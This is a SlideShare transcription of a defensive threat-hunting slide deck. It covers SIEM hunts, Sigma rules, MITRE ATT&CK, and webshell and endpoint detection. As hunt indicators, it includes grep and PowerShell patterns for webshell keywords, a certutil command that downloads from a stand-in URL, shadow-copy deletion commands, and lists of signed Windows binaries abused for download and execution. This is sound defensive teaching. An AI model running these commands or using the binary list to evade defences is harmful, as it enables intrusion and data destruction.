SlideShare a Scribd company logo

Threat hunting in cyber world

Download as PPTX, PDF
A
Akash Sarode

This is about what is threat hunting and how to perform it in cyberworld. Our traditional detection systems are being bypassed and we need modern approach to detect & respond to modern day threats. Entire demo of the same is available on youtube - https://www.youtube.com/playlist?list=PL2iM-fIRjbTCQVI4tR7U2I5IdwLb2QSi_

Technology
1 of 50
THREAT HUNTING IN CYBERWORLD AKASH SARODE
AKASH SARODE @AKKY2892  Threat Hunter  Security researcher  Twitter - @Akky2892  Blog – https://akkysanj.wordpress.com  Github - https://github.com/akky2892  Creator of NoMoreMalware and HuntIT.  Author of multiple whitepapers – Machine learning- Learning cybersecurity, Threat hunting – Hunter or Hunted, Analysis Using Analytics In Cybersecurity.  Previous Training – Machine learning : The Future.
COURSE DESCRIPTION  Introduction to Threat Hunting  Threat Hunting Terminology  Threat Intelligence and IOC  Hunting methodology  Threat hunting - Network, Endpoint level  Operationalizing & Automating Threat hunting  Use case of Real-time Threat Hunting  Research & Resources  Further study and Road Ahead
COURSE INDEX 1. Introduction to Threat Hunting • Threat hunting in Cyberworld • Why to perform threat hunting 2. Terminologies in hunting 3. Introducing Threat Intelligence • Threat Intelligence and Threat Hunting = Intelligent hunting • Indicators of Compromise IOC 4. Threat Hunting methodology • Threat hunting process & Threat Hunting loop • Threat Hunting techniques • Pyramid of pain • Hunting Maturity model
COURSE INDEX 5. Network hunting and Endpoint hunting • Hunting Webshells • Hunting malware • Network traffic hunting 6. Using MITRE ATT&CK framework • Sigma rules for threat hunting 7. Threat Hunting using SIEM 8. Examples of Threat hunting hunts 9. Real World Hunting Process 10. Machine Learning & Threat Hunting – Advanced hunting 11. Threat Hunting Resources 12. Conclusion • Red Teamer cyber kill chain vs Blue teamer defense chain
INTRODUCTION TO THREAT HUNTING  The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.  My definition – Finding stuff.  Threat Hunting is not a Technology but Approach.  Data- driven approach rather than traditional alert-driven approach.  Applying our knowledge in an effective way to look out for any anomalies in the environment.  Two ways to perform hunting –  Manual  Automated/Machine-assisted
THREAT HUNTING IN CYBERWORLD  In Cyberworld, attackers are getting intelligent day-by-day.  Modern-day attacks cannot be prevented/detected by alerts generated from SIEM.  Need of hour – Next generation detection system.  Hunting – not tool dependent, its people dependent.  Machine Learning can help to certain extent but manual intervention in triage is always required.  Instead of reacting to attacks, lets start proactively looking for threats before attack happens.
WHY TO PERFORM THREAT HUNTING  Alert driven approach is not sufficient.  Hypothesis driven approach will be the future.  Dependency on tools should be eradicated.  Hunting can be performed on any tool.  Benefit - Continuous improvement in detection capabilites, find unknown malicious activity
TERMINOLOGIES IN THREAT HUNTING  SIEM – Security Information & Event management  IOC- Indicators of Compromise  TTP – Tools, Techniques & procedures  IR- Incident response  EDR – Endpoint detection and response  UEBA – User entity and behavior analytics  BIOC – Behavior indicators of compromise
THREAT INTELLIGENCE  Threat Intelligence are feeds which are received in the form of urls, files, domains, etc.  Can be used to perform intelligent hunting.  IOC’s of attack/threat are generated by various research companies.  Sources –  articles,  security news,  new APT public report,  Twitter
THREAT INTELLIGENCE  BIOC – Behavioral Indicators.  Threat Hunting is effective by proper intels.  Threat Intel team proposes new intel, CIRT team builds hypothesis and create detection based on intel, Threat hunting team hunts with or without intel.  Various vendors are in market- Cisco Talos, Palo alto Unit 42, Cylance, AlienVault OTX, MISP, Yara rules. Threat Intelligence + Threat Hunting = Intelligent Hunting
THREAT HUNTING METHODOLOGY  Different methods to perform threat hunting.  We will be explaining the following –  Threat Hunting process  Threat Hunting loop  Pyramid of pain  Hunting Maturity model  ATT&CK for hunts  Hunt or be Hunted
THREAT HUNTING PROCESS  Ways of hunting –  Manual – Analyst need to continuously looking for anything that could be evidence/indicator of intrusion.  Important for the threat hunter to keep current on the latest security research.  Automated/Machine-assisted – Analyst uses software that leverages “Machine Learning” and “UEBA” to inform analyst about potential risks.  • It helps in providing Predictive and Prescriptive analytics.
THREAT HUNTING PROCESS  Hypothesis driven approach  What is Hypotheses ?  Assumption on attack behavior.  Actionable use case based on observations, intelligence, and experience  Three types of hypotheses:  Analytics-Driven: "Machine-learning and UEBA, used to develop aggregated risk scores that can also serve as hunting hypotheses"[5]  Situational-Awareness Driven: "Crown Jewel analysis, enterprise risk assessments, company- or employee-level trends"[5]  Intelligence-Driven: "Threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans"[  Hypothesis can be developed using any public APT report, twitter, security news, articles etc.
THREAT HUNTING PROCESS
THREAT HUNTING LOOP
THREAT HUNTING TECHNIQUES  Searching - use of specialized queries that return results and artifacts.  Clustering - machine learning model that uses advanced AI search techniques to make correlations within advanced and vast arrays of data.  Grouping – grouping artifacts together to identify any anomalies  Stack counting - stacking is how many times each unique value of column has occurred, like least commonly accessed file, rarity is suspicious.
PYRAMID OF PAIN
THREAT HUNTING MATURITY MODEL Source : sqrrl TMM
MITRE ATT&CK FRAMEWORK  MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.  It consists of TTP’s – Tactics, Techniques and procedures.  MITRE has also came up with a project name “CAR” Cyber Analytics Repository.  The Mitre team has listed down all those adversary behaviors and attack vectors carries out by an adversary on a victim machine.  It uses TTP’s Tactics, Techniques and Procedures and maps it to Cyber Kill chain.
MITRE ATT&CK FRAMEWORK
SIGMA RULES FOR THREAT HUNTING  Sigma is Generic Signature Format for SIEM Systems written by Florian Roth @Neo23x0 and Thomas Patzke.  Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner.  Sigma is for log files what Snort is for network traffic and YARA is for files.  Sigma rules contains mapping of all ATT&CK techniques.  Using sigma for threat hunting in siem, refer Sigma-to project:-  https://github.com/akky2892/Sigma-to
HUNTING WEBSHELLS  A web shell is a script written in the supported language of a target web server to be uploaded to enable remote access of the machine.  Mostly written in php or Asp  Multiple attack techniques can be used to upload webshell on webserver – XSS, SQL injection, RFI, LFI & many more…  Popular webshells – C99, R57, etc.  Let’s Hunt it!
HUNTING WEBSHELLS - KEYWORDS  First way for hunting webshells – Look out for reference to suspicious keywords within files on webserver - eval() or cmd.exe  For linux –  Under var/www/html directory, we can search for any php files with suspicious commands  find . –type ‘*.php’ | xargs egrep –l “(fsockopen|mail|exec|eval|system|base64_decode)”  For Windows –  Use Powershell to search in similar way  Get-childitem –recurse –include “*.php” | select-string “(fsockopen|mail|exec|eval|system|base64_decode)” | %{“$($._filename)”}
HUNTING WEBSHELLS - TOOLS  Multiple tools can be used to hunt for webshells in your environment. These tools are integrated with IOC’s , YARA rules to identify maliciousness.  LOKI IOC Scanner  PHP-Malware Finder  unPHP  Linux Malware detect  Invoke-ExchangeWebShellHunter  etc…  In addition to these techniques, we can also use baselines deviation and file stacking technique to hunt for webshell.
ENDPOINT HUNTING  Endpoint is where the malware behavior is more prevalent.  Most of the post-exploitation techniques can be hunted using Endpoint logs.  File activity, Registry activity, Process activity can be used to hunt out for any malicious behavior.  Multiple attack techniques such as DLL injection, hook injection, fuzzy hashing can be hunted down using endpoint logs.  ATT&CK MITRE is the best way to utilize the efforts and use these to hunt out for threats.
DLL HIJACKING  Post exploitation technique  Monitoring of Windows API calls, monitoring of windows registry path for any changes.  VirtualAllocEx reserves or changes a region of memory  WriteProcessMemory writes data to an area of memory in a specified process  CreateRemoteThread creates a thread in the address space of another process
APPININT DLLS  Powershell contains powersploit which can be used for code injection.  Monitoring malicous DLL loads - AppInit DLLs//// DLLs that are specified in the AppInit_DLLs value in the Registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows are loaded by user32.dll into every process that loads user32.dll.
NETWORK HUNTING  Network Traffic hunting requires network traffic logs.  Multiple tools can be used to analyze suspicious network traffic.  In addition to packet capturing, malicious traffic analysis features in Next Generation Firewall, UTM, IDS/IPS, we also need to hunt for traffic which has bypassed these devices.  Wireshark can be used.  Let’s look at simple example :-
NETWORK HUNTING – HTTPS TRAFFIC Normal HTTPS Suspicious HTTPS Port 443 or 8443 Malware use this port as well. Traffic is encrypted If traffic is not encrypted & secure socket layer packet details are empty, something suspicious Web server in FQDN format Server will point to IP address instead of FQDN HTTPS is Secure version -Secure socket Layer (SSL/TLS)
NETWORK HUNTING – HTTPS TRAFFIC
THREAT HUNTING USING SIEM  Threat Hunting is basically searching something.  We need to have proper & useful data to hunt for threats in enterprise.  SIEM – Security Information & Event Management is such tool which can prove to be useful in threat hunting.  SIEM collects logs from multiple devices of your network enterprise.  In addition to threat intelligence feeds, SIEM is very useful in querying the log database to identify any anomaly.  Let’s look at some of use cases:-
THREAT HUNTING USING SIEM Source : elastic.co
THREAT HUNTING USING SIEM Famous Email word/excel Macro attachments:- • Phishing email containing .doc with macro file • Macro contains script to initiate powershell.exe • Powershell.exe uses legitimate tools like mimikatz for credential dump for gaining hashes from memory. • What commands are executed using mimikatz.
THREAT HUNTING USING SIEM  Event viewer logs in SIEM can be useful to hunt for multiple threats.  Sysmon can be used to collect logs specific to endpoint systems based on defined configuration.  Search queries are useful in identifying any malicious behavior inside the enteprise environment.  In addition to threat intelligence and search queries, analytics is being used in SIEM which uses Machine learning to automatically identify any anomalies inside the environment.  We will look out for some examples of hunts to be clear -
THREAT HUNTING HUNTS Threat activity Hunts to look out for Hunting suspicious accounts See for any unusual accounts logged into machines with admin right – Event ID – 4672 (Special privileges assigned to new logon) Hunting Scheduled tasks Event ID – 4698, 106, 200 & 201 Hunting Pass the hash (PTH) Event ID- 4624 with logon type 3 Logon process – NtLmSsp, Key length – 0 Hunting for service creation Event ID- 4697 Hunting network shares Event ID - 4776 Hunting for process masquerading Look out for process path form where process is executing – Example explorer.exe should run from C:Windowsexplorer.exe or C:Windowssystem32explorer.exe
THREAT HUNTING HUNTS  PTH – Look for remote logins associated with execution/writing of binaries.  IFEOI – Changes to path - HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsxyz.exeDebugger  Rundll32.exe making connection to internet.  Deletion of shadow copy file using wmic, vssadmin | *delete
THREAT HUNTING HUNTS  Disable system restore - Registry Write and Key = HKLMSoftwareMicrosoftWindows NtSystemRestoreDisableSR and value = 1  Connection to process other than browser to suspicious domains like .tk, .onion,.tor2web etc.  Certutil.exe used to download files from internet - certutil.exe -urlcache -split -f http://example/file.txt
THREAT HUNTING HUNTS  Monitor scheduled tasks – at and schtasks windows task scheduler used to schedule scripts to be executed.  Double extensions malwares  Control.exe used to execute file stored in ADS.  Gpscript.exe used to executes logon scripts.  Mavinject.exe used to execute, read ADS files.  Hh.exe – executing and downloading files  Scriptrunner.exe – execution  Regsvr32.exe – Download script from internet All are windows signed binaries, so none of Endpoint protection will tag it.
THREAT HUNTING HUNTS  Similar to the discussed hunts, there are multiple techniques which can be used to hunt for threats.  A collection of many such techniques is collaborated and presented by ATT&CK MITRE & Sigma rules.  Hunting using SIEM is the way ahead but there are multiple SIEM vendors – RSA, Elasticsearch, Arcsight, Qradar etc.  In order to make life easy, I have prepared a Master Sheet of threat hunting hunts mapping it to respective SIEM vendors-  Query it & Hunt IT - https://github.com/akky2892/Sigma-to/blob/master/Sigma-to.xlsx
REAL WORLD HUNTING PROCESS What is threat hunting:- The human-centric process of proactively searching for evidence of attacks. Anyone can threat hunt; experienced threat hunters have better models. Threat hunting is the application of one or more models or frameworks to a problem. The easiest framework to start with is Attack Centric Hunting. In Attack centric hunting (ACH), you focus on seeking evidence that identifies a specific attack. It's a 4 step process that starts with a question.  1. Question - Has an Attack incident occurred on my network?  2. What am I looking for?  3. Where am I likely to find it?  4. How can I manipulate the data to find it?
REAL WORLD HUNTING PROCESS Example: Question: Has Credential theft happened on my network?  1. What am I looking for? a) Evidence of credential dumping application execution. b) never before seen processes, process anomalies.  2. Where am I likely to find it ? a) Windows process execution logs.  3. How can I manipulate the data to see it ? a) Aggregate EID 4688 by process name for all endpoints and sort by least frequent occurrence (LFO). (Event ID4688 = Process Execution event ID. )
MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING  Multiple SIEM vendors, or security product solutions uses Machine Learning or AI to assist threat hunting.  Machine learning uses Classification, Association algorithms to identify & detect any kind of anomalies in network.  Network traffic spike, unusual user account, computer account behavior, any deviation from baselines can be identified by such techniques.  Analytics is widely used in modern day world and it has find it place in Cyber security as well.  Microsoft Defender, Microsoft ATA, Qradar SIEM, Fireeye, etc.
MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING
MICROSOFT ATA Source: Microsoft.com
THREAT HUNTING RESOURCES  Threathunting.net  MITRE ATT&CK - attack.mitre.org  https://github.com/ThreatHuntingProject/ThreatHunting - David J Bianco  https://github.com/VVard0g/ThreatHunter-Playbook - Roberto Rodriguez (@Cyb3rWard0g)  https://blog.menasec.net  https://github.com/akky2892/Cyber-Threat-Hunting  Whitepapers, blogs, articles on threat hunting.  Research work on twitter - Oddvar Moe, Florian roth, Roberto rodriques, Olaf hangton, David J Bianco, sqrrl, Samir @ Sbousseaden & many more.  Sans – Threat Hunting Summit, defcon, Att&ckon, Derbycon, Nullcon Webinars/Webcasts …
CONCLUSION Red Teamer Cyber Kill Chain Blue Teamer Defense Chain Identify Preven t Detect Respond Recover
Thank You & Hunt IT !

Recommended

Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersInfosec
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for BeginnersSKMohamedKasim
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 

Recommended

Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersInfosec
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for BeginnersSKMohamedKasim
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Cyber threat intelligence ppt
Cyber threat intelligence pptCyber threat intelligence ppt
Cyber threat intelligence pptKumar Gaurav
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdflaibaarsyila
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
SIEM and Threat Hunting
SIEM and Threat HuntingSIEM and Threat Hunting
SIEM and Threat Huntingn|u - The Open Security Community
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Soc and siem and threat hunting
Soc and siem and threat huntingSoc and siem and threat hunting
Soc and siem and threat huntingVikas Jain
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware AnalysisRamin Farajpour Cami
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 

More Related Content

What's hot

Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Cyber threat intelligence ppt
Cyber threat intelligence pptCyber threat intelligence ppt
Cyber threat intelligence pptKumar Gaurav
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdflaibaarsyila
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Soc and siem and threat hunting
Soc and siem and threat huntingSoc and siem and threat hunting
Soc and siem and threat huntingVikas Jain
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 

What's hot (20)

Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Cyber threat intelligence ppt
Cyber threat intelligence pptCyber threat intelligence ppt
Cyber threat intelligence ppt
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda Security
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdf
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
SIEM and Threat Hunting
SIEM and Threat HuntingSIEM and Threat Hunting
SIEM and Threat Hunting
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Soc and siem and threat hunting
Soc and siem and threat huntingSoc and siem and threat hunting
Soc and siem and threat hunting
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 

Similar to Threat hunting in cyber world

01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Huntpedia
HuntpediaHuntpedia
HuntpediaJc Sv
 
huntpedia.pdf
huntpedia.pdfhuntpedia.pdf
huntpedia.pdfCecilSu
 
Honeypot- An Overview
Honeypot- An OverviewHoneypot- An Overview
Honeypot- An OverviewIRJET Journal
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfssuser4237d4
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfssuser4237d4
 
A REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKINGA REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKINGNathan Mathis
 
CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETTravarsaPrivateLimit
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defenceOWASP EEE
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET Journal
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hackDharmesh Makwana
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity InnovationPete Burnap
 
Ethical Hacking Overview
Ethical Hacking OverviewEthical Hacking Overview
Ethical Hacking OverviewSubhoneel Datta
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion TechniquesThomas Roccia
 

Similar to Threat hunting in cyber world (20)

Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Huntpedia
HuntpediaHuntpedia
Huntpedia
 
huntpedia.pdf
huntpedia.pdfhuntpedia.pdf
huntpedia.pdf
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Honeypot- An Overview
Honeypot- An OverviewHoneypot- An Overview
Honeypot- An Overview
 
Super1
Super1Super1
Super1
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
A REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKINGA REVIEW PAPER ON ETHICAL HACKING
A REVIEW PAPER ON ETHICAL HACKING
 
CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEET
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity Innovation
 
